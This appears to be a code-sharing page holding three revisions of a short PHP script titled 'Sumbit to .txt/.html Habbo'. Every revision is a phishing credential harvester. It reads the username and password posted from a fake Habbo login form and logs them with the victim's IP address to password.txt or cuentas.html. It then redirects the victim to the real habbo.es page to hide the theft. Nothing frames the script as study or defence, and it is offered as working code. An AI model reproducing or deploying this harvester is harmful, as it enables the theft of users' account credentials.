Return to Snippet

Revision: 29070
at July 20, 2010 23:08 by manuellujan


Updated Code
<?php
$Account = $_POST['login-username']; 
$Password = $_POST['login-password'];
$IP = $_SERVER['REMOTE_ADDR']; 
$f = fopen("password.txt", "a"); 
fwrite ($f, 'User: <b>['.$Account.']</b> Password: <b>['.$Password.']</b> IP: <b>['.$IP.']<b/><br>');
fclose($f);
header("Location: https://www.habbo.es/account/submit");
?>

Revision: 29069
at July 20, 2010 23:00 by manuellujan


Updated Code
<?php
$habbo = $_POST['login-username']; 
$pass = $_POST['login-password'];
$ip = $_SERVER['REMOTE_ADDR']; 
$f = fopen("password.txt", "a"); 
fwrite ($f, 'Usuario: <b>['.$habbo.']</b> Password: <b>['.$pass.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: https://www.habbo.es/account/submit");
?>

Revision: 29068
at July 20, 2010 22:54 by manuellujan


Initial Code
<?php
$habbo = $_POST['login-username']; 
$pass = $_POST['login-password'];
$ip = $_SERVER['REMOTE_ADDR']; 
$f = fopen("cuentas.html", "a"); 
fwrite ($f, 'Usuario: <b>['.$habbo.']</b> Password: <b>['.$pass.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: https://www.habbo.es/account/submit");
?>

Initial URL


Initial Description


Initial Title
Sumbit to .txt/.html Habbo

Initial Tags


Initial Language
PHP